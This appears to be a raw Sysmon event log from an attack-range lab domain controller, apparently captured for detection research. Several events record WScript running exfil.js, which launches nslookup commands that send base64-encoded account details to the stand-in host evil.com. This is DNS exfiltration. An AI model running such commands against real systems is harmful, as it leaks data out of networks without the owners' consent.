14:21:51.621{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.621{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.621{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.621{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-6846-000000005F02}2060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.621{2E1864BB-18FF-629A-6646-000000005F02}7324776C:\Windows\system32\cmd.exe{2E1864BB-18FF-629A-6846-000000005F02}2060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.622{2E1864BB-18FF-629A-6846-000000005F02}2060C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FF-629A-6646-000000005F02}732C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgyzws.tmp 2>&1 10341000x8000000000000000215753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.605{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-6746-000000005F02}5624C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.604{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-6746-000000005F02}5624C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.583{2E1864BB-18FF-629A-6746-000000005F02}56246200C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-6646-000000005F02}732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.583{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-6746-000000005F02}5624C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.583{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.583{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.583{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.583{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.583{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-6646-000000005F02}732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.583{2E1864BB-18E0-629A-6742-000000005F02}39767416C:\Windows\System32\WScript.exe{2E1864BB-18FF-629A-6646-000000005F02}732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.583{2E1864BB-18FF-629A-6646-000000005F02}732C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgyzws.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.568{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfzpb.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.552{2E1864BB-18FF-629A-6446-000000005F02}20364192C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-6546-000000005F02}7628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.552{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.552{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.552{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.552{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.552{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-6546-000000005F02}7628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.552{2E1864BB-18FF-629A-6346-000000005F02}34606228C:\Windows\system32\cmd.exe{2E1864BB-18FF-629A-6546-000000005F02}7628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.559{2E1864BB-18FF-629A-6546-000000005F02}7628C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FF-629A-6346-000000005F02}3460C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfzpb.tmp 2>&1 10341000x8000000000000000215733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.537{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-6446-000000005F02}2036C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.537{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-6446-000000005F02}2036C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.537{2E1864BB-18FF-629A-6446-000000005F02}20364192C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-6346-000000005F02}3460C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.521{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-6446-000000005F02}2036C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.521{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.521{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 